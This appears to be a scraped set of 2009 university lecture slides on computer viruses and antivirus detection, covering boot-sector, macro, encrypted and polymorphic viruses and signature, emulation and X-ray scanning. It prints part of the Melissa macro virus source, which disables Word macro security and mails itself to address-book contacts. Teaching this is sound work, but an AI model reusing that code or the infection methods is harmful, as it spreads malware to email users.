770 likes | 937 Views
CSE 127 Computer Security Spring 2009. Malware I: Viruses and virus-defense Stefan Savage. Many sides courtesy Carey Nachenberg. Recap. Various ways to compromise software systems based in input and timing Buffer overflows, format string errors, TOCTOU, SQL injection, XSS etc…
E N D
CSE 127Computer SecuritySpring 2009 Malware I: Viruses and virus-defense Stefan Savage Many sides courtesy Carey Nachenberg
Recap • Various ways to compromise software systems based in input and timing • Buffer overflows, format string errors, TOCTOU, SQL injection, XSS etc… • But once you’ve compromised system, then what does the malicious software do? • First: propagates itself to create an installed base • Today: viruses – the oldest mass malware
Reminder You have a project due on Tuesday
Viruses • A computer virus is a (malicious) program • Attaches to a host program or data • Creates (possibly modified) copies of itself • Payload of program may have other effects (deleting files, opening backdoors, printing messages, etc) • Viruses traditionally require some user action to activate (i.e. execute some file, open some spreadsheet, etc)
Virus Writer’s Goals • Hard to detect • Hard to destroy or deactivate • Spreads infection widely/quickly • Can reinfect a host • Easy to create
Kinds of Viruses • Boot Sector Viruses • Historically important, but less common today • Memory Resident Viruses • Standard infected executable • Macro Viruses • Embedded in documents (like Word docs) • E-mail/IM Viruses • Spread via attachments • Web platform viruses • Spread on Web sites (e.g. social net applications)
Boot sector Viruses (old school) • Bootstrap Process: • Firmware (ROM) copies MBR (master boot record) to memory, jumps to that program • MBR (or Boot Sector) • Fixed position on disk • “Chained” boot sectors permit longer Bootstrap Loaders MBR boot boot
Boot sector Viruses • Virus breaks the chain • Inserts virus code • Reconnects chain afterwards MBR boot virus boot
Why attack the Bootstrap? • Automatically executed before OS is running • Any thus, before detection tools are running • OS hides boot sector information from users • Hard to discover that the virus is there • Harder to fix • Any good virus scanning software scans the boot sectors • But good bootsector viruses may restore good bootsector during normal operation (replace it when you logout or when anti-virus software isn’t running) • Bootsector malware is back with a vengeance (Meebroot/Sinowal)
Virus Attachment to Host Code Modified Program Original Program • Simplest case: insert copy at the beginning of an executable file • Runs before other code of the program • Historically most common program virus • Runs before & after original program • Virus can clean up after itself • Virus could modify code in place • Doesn’t change size, but could change behavior • Maybe harder to detect?
Macro Viruses • Many applications support Macros • Macros are just programs • Word processors & Spreadsheets • Startup macro • Macros turned on by default • Visual Basic Script (VBScript)
Melissa Macro Virus • Implementation • VBA (Visual Basic for Applications) code associated with the "document.open" method of Word • Strategy • Email message containing an infected Word document as an attachment (social engineering) • Opening Word document triggers virus if macros are enabled • Under certain conditions included attached documents created by the victim
Melissa Macro Virus: Behavior • Setup • Lowers the macro security settings • Permit all macros to run without warning • Checks registry for key value “… by Kwyjibo” • HKEY_Current_User\Software\Microsoft\Office\Melissa? • Propagation • Sends email message to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro
Melissa Macro Virus: Behavior • Propagation Continued • Infects Normal.doc template file • Normal.doc is used by all Word documents • “Joke” • If minute matches the day of the month, the macro inserts message “Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here.”
// Melissa Virus Source Code Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If
Melissa Virus • Transmission Rate • The first confirmed reports of Melissa were received on Friday, March 26, 1999. • By Monday, March 29, it had reached more than 100,000 computers. • One site got 32,000 infected messages in 45 minutes. • Damage • Denial of service: mail systems off-line. • Could have been much worse • Remedy • Filter mail for virus signature (macro in .doc files) • Don’t run Macros in unknown documents by default • Clean Normal.doc
Detecting Viruses • Scanning • Integrity checking • Heuristic detection
Virus Signatures • Viruses can’t be completely invisible: • Code must be stored somewhere • Virus must do something when it runs • Idea: look in files for “signature” byte sequences that are unique to the virus • Issues • Where to scan (beginning of file, whole file, registry settings, etc) • How to scan (look for “ILOVEYOU” string, or actually execute program) • How long to scan (tradeoffs in performance/coverage) • How to distinguish polymorphs (research issue)
0100 EB1C JMP 011E 0102 BE1B02 MOV SI,021B 0105 BF1B01 MOV DI,011B 0108 8BCE MOV CX,SI 010A F7D9 NEG CX 010C FC CLD 010D B81B01 MOV AX,011B 0110 06 PUSH ES 0111 50 PUSH AX 0112 06 PUSH ES 0113 B81801 MOV AX,0118 0116 50 PUSH AX 0117 CB RETF 0118 F3 REPZ 0119 A4 MOVSB 011A CB RETF 011B E93221 JMP 2250 011E 83C24F ADD DX,+4F 0121 8BFA MOV DI,DX 0123 81FF8000 CMP DI,0080 0127 725E JB 0187 0129 7406 JZ 0131 012B C606250273 MOV BYTE PTR [0225],73 0130 90 NOP 0131 FEC5 INC CH 0133 7303 JNB 0138 0135 80C140 ADD CL,40 0138 B8010C MOV AX,0C01 013B 8BD6 MOV DX,SI 013D CD13 INT 13 Infected Program The Simple Virus 1. User runs an infected program. 2. Program transfers control to the virus.
0100 EB1C JMP 011E 0102 BE1B02 MOV SI,021B 0105 BF1B01 MOV DI,011B 0108 8BCE MOV CX,SI 010A F7D9 NEG CX 010C FC CLD 010D B81B01 MOV AX,011B 0110 06 PUSH ES 0111 50 PUSH AX 0112 06 PUSH ES 0113 B81801 MOV AX,0118 0116 50 PUSH AX 0117 CB RETF 0118 F3 REPZ 0119 A4 MOVSB 011A CB RETF 011B E93221 JMP 2250 011E 83C24F ADD DX,+4F 0121 8BFA MOV DI,DX 0123 81FF8000 CMP DI,0080 0127 725E JB 0187 0129 7406 JZ 0131 012B C606250273 MOV BYTE PTR [0225],73 0130 90 NOP 0131 FEC5 INC CH 0133 7303 JNB 0138 0135 80C140 ADD CL,40 0138 B8010C MOV AX,0C01 013B 8BD6 MOV DX,SI 013D CD13 INT 13 0117 83C24F ADD DX,+4F 011A 8BFA MOV DI,DX 011C 81FF8000 CMP DI,0080 0120 725E JB 0187 0122 7406 JZ 0131 0124 C606250273 MOV BYTE PTR [0225],73 0129 90 NOP 012A FEC5 INC CH 012C 7303 JNB 0138 012E 80C140 ADD CL,40 0132 B8010C MOV AX,0C01 0135 8BD6 MOV DX,SI 0137 CD13 INT 13 4. Virus appends its logic to the end of the new file. Infected Program The Simple Virus 0100 B435 MOV AH,35 0102 B021 MOV AL,21 0104 CD21 INT 21 0106 8C06A002 MOV [02A0],ES 010A 891E9E02 MOV [029E],BX 010E B425 MOV AH,25 0110 B021 MOV AL,21 0112 BA2001 MOV DX,0120 0115 CD21 INT 21 3. Virus locates a new program.
0100 EB1C JMP 011E 0102 BE1B02 MOV SI,021B 0105 BF1B01 MOV DI,011B 0108 8BCE MOV CX,SI 010A F7D9 NEG CX 010C FC CLD 010D B81B01 MOV AX,011B 0110 06 PUSH ES 0111 50 PUSH AX 0112 06 PUSH ES 0113 B81801 MOV AX,0118 0116 50 PUSH AX 0117 CB RETF 0118 F3 REPZ 0119 A4 MOVSB 011A CB RETF 011B E93221 JMP 2250 011E 83C24F ADD DX,+4F 0121 8BFA MOV DI,DX 0123 81FF8000 CMP DI,0080 0127 725E JB 0187 0129 7406 JZ 0131 012B C606250273 MOV BYTE PTR [0225],73 0130 90 NOP 0131 FEC5 INC CH 0133 7303 JNB 0138 0135 80C140 ADD CL,40 0138 B8010C MOV AX,0C01 013B 8BD6 MOV DX,SI 013D CD13 INT 13 0100 EB1C JMP 0117 Infected Program The Simple Virus 0100 B435 MOV AH,35 0102 B021 MOV AL,21 0104 CD21 INT 21 0106 8C06A002 MOV [02A0],ES 010A 891E9E02 MOV [029E],BX 010E B425 MOV AH,25 0110 B021 MOV AL,21 0112 BA2001 MOV DX,0120 0115 CD21 INT 21 0117 83C24F ADD DX,+4F 011A 8BFA MOV DI,DX 011C 81FF8000 CMP DI,0080 0120 725E JB 0187 0122 7406 JZ 0131 0124 C606250273 MOV BYTE PTR [0225],73 0129 90 NOP 012A FEC5 INC CH 012C 7303 JNB 0138 012E 80C140 ADD CL,40 0132 B8010C MOV AX,0C01 0135 8BD6 MOV DX,SI 0137 CD13 INT 13 5. Virus updates the new program so the virus gets control when the program is launched.
Head/Tail Scanners Most of these application-infecting viruses attached themselves to either the top or bottom of the host file: So anti-virus engineers built head/tail scanners. Virus Host Host The scanner loads the head and tail regions of the file into a buffer and then scans with a multi-string search algorithm. Virus
So what do the bad guys do? • Move the virus to the middle of the file • Becomes prohibitively expensive to scan • Must scan whole file • Solution: scalpel scanning • Idea: limit scanning to likely entry-points for viruses • If you have more time you can also scan for more than just strings (regular expressions)
JMP JMP JMP ADD Scalpel Scanning • Locate the main program entry-point. • While the current instruction is a JUMP or a CALL instruction, trace it. • If the current instruction is not a JUMP or CALL instruction, search for all fingerprints in this region of the file. 0100 EB04 JMP 106 0102 B021 MOV AL,21 0104 CD21 INT 21 0106 EB09 JMP 112 0108 B404 MOV AH, 04 010A 891E9E02 MOV [029E],BX 010E B425 MOV AH,25 0110 B021 MOV AL,21 0112 E90200 JMP 117 0115 CD21 INT 21 0117 83C24F ADD DX,+4F 011A 8BFA MOV DI,DX 011C 81FF8000 CMP DI,0080 0120 725E JB 0187 0122 7406 JZ 0131 0124 C606250273 MOV BYTE PTR [0225],73 0129 90 NOP 012A FEC5 INC CH 012C 7303 JNB 0138 012E 80C140 ADD CL,40 0132 B8010C MOV AX,0C01 0135 8BD6 MOV DX,SI 0137 CD13 INT 13
Decrypt KEY1 Wjsvt Decrypt KEY2 Uhqtr The Encrypted Virus Soon after the first generation of executable viruses, virus authors began writing self-encrypting strains. HOST These viruses carry a small decryption loop that runs first, decrypts the virus body and then launches the virus. Each time the virus infects a new file, it changes the encryption key so the virus body looks different. HOST
The Encrypted Virus • MOV DI, 120h • MOV AX, [DI] • XOR AX, 0030h • MOV [DI], AX • ADD DI, 2h • CMP DI, 2500h • JNE 3 • 8. PKEPAJHENZAW • 9. MNANTPOOTIZN • ... • MOV DI, 120h • MOV AX, [DI] • XOR AX, 5132h • MOV [DI], AX • ADD DI, 2h • CMP DI, 2500h • JNE 3 • 8. WJSVTPBMZPL • 9. NAADJGNANW • ... The decryption routine stays the same. Only the key(s) change. The encrypted body changes. Still easy to detect because the decryption loop stays the same.
The Polymorphic Virus • Polymorphic viruses are self-encrypting viruses with a changing decryption algorithm • When infecting a new file, such a virus: • Generates brand-new decryption code from scratch • Encrypts a copy of itself using a complementary encryption algorithm • Inserts both the new decryption code and the encrypted body of the virus into target file
Decryption Loop Virus Virus Mutation Engine Mutation Engine Virus Virus Mutation Engine Mutation Engine The Polymorphic Virus RAM Host Program Decryption Loop 1. User Executes Program
Virus Virus Mutation Engine Mutation Engine Virus Virus Mutation Engine Mutation Engine The Polymorphic Virus RAM Host Program Decryption Loop Decryption Loop 1. User Executes Program 2. Virus Decrypts Itself
Virus Virus Mutation Engine Mutation Engine Virus Virus Mutation Engine Mutation Engine The Polymorphic Virus RAM Host Program Decryption Loop Decryption Loop 1. User Executes Program 2. Virus Decrypts Itself
Virus Virus Mutation Engine Mutation Engine Virus Virus Mutation Engine Mutation Engine The Polymorphic Virus RAM Host Program Decryption Loop Decryption Loop 1. User Executes Program 2. Virus Decrypts Itself
Host Program (New) Virus Virus Mutation Engine Mutation Engine Virus Virus Mutation Engine Mutation Engine The Polymorphic Virus RAM Host Program Decryption Loop Decryption Loop 3. Virus finds new prog.
Virus Virus Mutation Engine Mutation Engine Decryption Loop’ Virus Virus Mutation Engine Mutation Engine The Polymorphic Virus RAM Host Program Host Program Decryption Loop (New) Decryption Loop 3. Virus finds new prog. 4. Mutation engine creates new decryptor.
Virus Virus Mutation Engine Mutation Engine Decryption Loop’ Virus Virus Virus Mutation Engine Mutation Engine Mutation Engine The Polymorphic Virus RAM Host Program Host Program Decryption Loop (New) Decryption Loop 5. Virus makes a new copy of itself and encrypts this copy.
Virus Virus Mutation Engine Mutation Engine Decryption Loop’ Virus Virus Virus Mutation Engine Mutation Engine Mutation Engine The Polymorphic Virus RAM Host Program Host Program Decryption Loop (New) Decryption Loop 5. Virus makes a new copy of itself and encrypts this copy.
Virus Virus Mutation Engine Mutation Engine Decryption Loop’ Virus Virus Virus Mutation Engine Mutation Engine Mutation Engine The Polymorphic Virus RAM Host Program Host Program Decryption Loop (New) Decryption Loop 5. Virus makes a new copy of itself and encrypts this copy.
Virus Virus Mutation Engine Mutation Engine Decryption Loop’ Virus Virus Virus Mutation Engine Mutation Engine Mutation Engine The Polymorphic Virus RAM Host Program Host Program Decryption Loop (New) Decryption Loop 5. Virus makes a new copy of itself and encrypts this copy.
Virus Virus Mutation Engine Mutation Engine Decryption Loop’ Virus 6. Virus appends the new decryptor and encrypted virus body to new file. Virus Virus Mutation Engine Mutation Engine Mutation Engine The Polymorphic Virus RAM Host Program Host Program Decryption Loop (New) Decryption Loop
Virus Virus Mutation Engine Mutation Engine Decryption Loop’ Decryption Loop’ Virus Virus Virus Virus Mutation Engine Mutation Engine Mutation Engine Mutation Engine The Polymorphic Virus RAM Host Program Host Program Decryption Loop (New) Decryption Loop
Virus Virus Mutation Engine Mutation Engine Decryption Loop’ Decryption Loop’ Virus Virus Mutation Engine Mutation Engine The Polymorphic Virus RAM And we have a new infection! Host Program Decryption Loop (New)
AddrMachine CodeMnemonic 0200 BE36F2 MOV SI,F2360203 8BFE MOV DI,SI 0205 B807D7 MOV AX,D7070208 33C7 XOR AX,DI020A 95 XCHG BP,AX020B B858AC MOV AX,AC58020E F7ED IMUL BP0210 2560B1 AND AX,B1600213 95 XCHG BP,AX0214 B8C0EA MOV AX,EAC00217 8BCD MOV CX,BP0219 80E11F AND CL,1F021C D3E8 SHR AX,CL021E 85C0 TEST AX,AX0220 7503 JNZ 02250222 FB STI0223 F1 DB F10224 AB STOSW0225 91 XCHG CX,AX0226 36 SS:0227 8B852310 MOV AX,[DI+1023]022B D3C0 ROL AX,CL 022D BA4FB9 MOV DX,B94F0230 F7E2 MUL DX 0232 36 SS:0233 89852310 MOV [DI+1023],AX 0237 8BEF MOV BP,DI0239 8BFD MOV DI,BP023B 47 INC DI023C 47 INC DI023D 75C6 JNZ 0205 The Polymorphic Virus AddrMachine CodeMnemonic 0100 50 PUSH AX 0101 B8347E MOV AX,7E34 0104 25A907 AND AX,07A9 0107 95 XCHG BP,AX 0108 B840B2 MOV AX,B240 010B BABBB8 MOV DX,B8BB 010E F7EA IMUL DX 0110 93 XCHG BX,AX 0111 B8B4D2 MOV AX,D2B4 0114 03C3 ADD AX,BX 0116 2BC5 SUB AX,BP 0118 BA479A MOV DX,9A47 011B F7E2 MUL DX 011D 95 XCHG BP,AX 011E B809F4 MOV AX,F409 0121 2BC5 SUB AX,BP 0123 91 XCHG CX,AX 0124 B8AB6A MOV AX,6AAB 0127 BA972C MOV DX,2C97 012A F7E2 MUL DX 012C D1C0 ROL AX,1 012E 80E11F AND CL,1F 0131 D3E0 SHL AX,CL 0133 91 XCHG CX,AX 0134 B8E1CE MOV AX,CEE1 0137 03C1 ADD AX,CX 0139 93 XCHG BX,AX 013A B84A43 MOV AX,434A 013D 29C3 SUB BX,AX 013F F7DB NEG BX 0141 8B86381B MOV AX,[BP+1B38] 0145 8ACB MOV CL,BL0147 D3C8 ROR AX,CL 0149 2D23C9 SUB AX,C923 014C B108 MOV CL,08 014E D3C8 ROR AX,CL 0150 8786381B XCHG AX,[BP+1B38] 0154 B80765 MOV AX,6507 0157 BA55B3 MOV DX,B355 015A F7E2 MUL DX 015C 96 XCHG SI,AX 015D 8BC5 MOV AX,BP 015F 2BC6 SUB AX,SI 0161 BAE337 MOV DX,37E3 0164 F7E2 MUL DX 0166 96 XCHG SI,AX 0167 B80765 MOV AX,6507 016A BA55B3 MOV DX,B355 016D F7E2 MUL DX 016F 91 XCHG CX,AX 0170 8BC6 MOV AX,SI 0172 BACBC5 MOV DX,C5CB 0175 F7E2 MUL DX 0177 03C1 ADD AX,CX 0179 95 XCHG BP,AX 017A 45 INC BP 017B 45 INC BP 017C 75A0 JNZ 011E Here we have a decryption loop from an MtE-based virus infection. And here’s a second generation decryption loop of the same virus strain.
Detecting The Polymorphic Virus So how do we detect such a beast? 1. Use lots of wildcard strings strings/scripts: B98104%F%1BD????%FBE????%F%53142??%F??C0%F45%F??CC%FE2 B98104%8BB????%FBE????%F%53140??%F??C0%F43%F??CC%FE2 B98104%F%5BE????%F%53144??%F??C0%F46%F??CC%FE2 B98104%F%9BF????%F%53145??%F??C0%F47%F??CC%FE2 B98104%F%1BD????%FBF????%F%53143??%F??C0%F47%F??CC%FE2 B98104%8BB????%F%1BF????%F%53141??%F??C0%F47%F??CC%FE2 The number of strings (alg. sigs) explodes quickly! Detecting the decryption loop is prone to false positives! 2. X-ray techniques (plaintext attack on encrypted virus body)
Scanned file: 60 5C 5D 47 14 5D 47 14-55 14 40 51 47 40 Virus plain-text: 54 68 69 73 20 69 73 20-61 20 74 65 73 74 34 34 34 34 The key must be 34! The scheme must be XOR! + + + + X-ray scanning Assume the file is infected and perform a plain-text attack of the encrypted virus code. This only works for simple schemes (but its often sufficient). Host Program AMBCAPQYEQYQWERQWERQWERERGQWETWLRW 7 bytes from EOF = “VIRUS”?
“Generic” Decryption • Invented by Alan Solomon (a.k.a. Dr. Solomon) • Chose name to obscure how it worked • Assumptions • Virus gains control of the host immediately • Virus decrypts itself deterministically • Virus has a some static body that can be detected with traditional signatures • Key idea: • Emulate code execution until the virus decrypts itself • Typically use some sort of virtual machine (VM) environment • Search for signatures in memory
Simulated OS and other data structures 2. Allow the program to execute normally. Host Program Decryption Loop Virus Virus Virus Mutation Engine Mutation Engine Mutation Engine Modified Memory Generic Decryption 1. Load suspected program into VM. Host Program Decryption Loop Virtual Machine Program Off Disk
Simulated OS and other data structures Host Program Decryption Loop Virus Mutation Engine Modified Memory Generic Decryption 1. Load suspected program into VM. 1. Fetch Byte 2. Allow the program to execute normally. 2. Decrypt Byte 3. Store Byte 4. Loop to 1 3. “Tag” all modified memory as the program executes. Virtual Machine
Generic Decryption 1. Load suspected program into VM. Simulated OS and other data structures 1. Fetch Byte 2. Allow the program to execute normally. 2. Decrypt Byte 3. Store Byte Host Program 4. Loop to 1 3. “Tag” all modified memory as the program executes. Decryption Loop Virus Mutation Engine Modified Memory Virtual Machine
Generic Decryption 1. Load suspected program into VM. Simulated OS and other data structures 1. Fetch Byte 2. Allow the program to execute normally. 2. Decrypt Byte 3. Store Byte Host Program 4. Loop to 1 3. “Tag” all modified memory as the program executes. Decryption Loop Virus Mutation Engine Virtual Machine Modified Memory
Generic Decryption 1. Load suspected program into VM. Simulated OS and other data structures 1. Fetch Byte 2. Allow the program to execute normally. 2. Decrypt Byte 3. Store Byte Host Program 4. Loop to 1 3. “Tag” all modified memory as the program executes. Decryption Loop x Virus Mutation Engine Virtual Machine Modified Memory